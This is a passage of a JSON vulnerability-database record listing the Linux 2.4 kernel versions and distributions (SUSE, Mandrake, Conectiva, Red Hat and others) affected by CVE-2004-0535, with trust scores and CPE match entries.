        "vendor": "linux",
        "version": "2.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "gentoo",
        "version": "1.4"
      },
      {
        "model": "email server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "3.1"
      },
      {
        "model": "linux firewall cd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "7"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "conectiva",
        "version": "9.0"
      },
      {
        "model": "linux connectivity server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "conectiva",
        "version": "8.0"
      },
      {
        "model": "mandrake linux corporate server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "mandrake multi network firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "8.2"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "9.1"
      },
      {
        "model": "linux admin-cd for firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "secure community",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "engardelinux",
        "version": "2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.23_ow2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8.2"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "10.0"
      },
      {
        "model": "office server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "engardelinux",
        "version": "1.5"
      },
      {
        "model": "linux database server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "linux firewall live-cd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8"
      },
      {
        "model": "linux office server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "9.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "9.0"
      },
      {
        "model": "email server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "iii"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.24_ow1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "2.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "2.1"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "7"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "8"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (ws)"
      },
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "trustix",
        "version": "2.1"
      },
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "trustix",
        "version": "2.0"
      },
      {
        "model": "secure enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "trustix",
        "version": "2.0"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "8"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "7"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "8.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "9"
      },
      {
        "model": "propack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sgi",
        "version": "3.0"
      },
      {
        "model": "suse email server iii",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "suse email server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "3.1"
      },
      {
        "model": "office server",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.1"
      },
      {
        "model": "linux personal x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.0"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.0"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "8.2"
      },
      {
        "model": "linux office server",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux live-cd for firewall",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux firewall on cd",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux database server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "0"
      },
      {
        "model": "linux connectivity server",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux admin-cd for firewall",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "advanced workstation for the itanium processor ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "linux mandrake amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.0"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.0"
      },
      {
        "model": "linux mandrake amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.2"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.2"
      },
      {
        "model": "linux mandrake ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.1"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.1"
      },
      {
        "model": "multi network firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.0"
      },
      {
        "model": "corporate server x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -ow1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel -pre9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel -ow2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel pre7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel -pre6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel pre-8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18x86"
      },
      {
        "model": "kernel .0-test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test12",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "secure professional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "engarde",
        "version": "1.5"
      },
      {
        "model": "secure community",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "engarde",
        "version": "2.0"
      },
      {
        "model": "kernel -pre2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "10352"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000194"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0535"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-072"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_email_server:3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_email_server:iii:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_office_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:conectiva:linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:mandrakesoft:mandrake_multi_network_firewall:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_firewall_live-cd:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_office_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_admin-cd_for_firewall:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_connectivity_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:conectiva:linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:engardelinux:secure_community:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_database_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_firewall_cd:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:engardelinux:secure_linux:1.5:*:professional:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test10:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:pre4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:pre7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:2.1:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:7:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:gentoo:linux:1.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:pre1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.24_ow1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.2:*:amd64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.0:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test11:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test12:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test9:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.0:*:amd64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.0:*:i386:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:*:x86:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
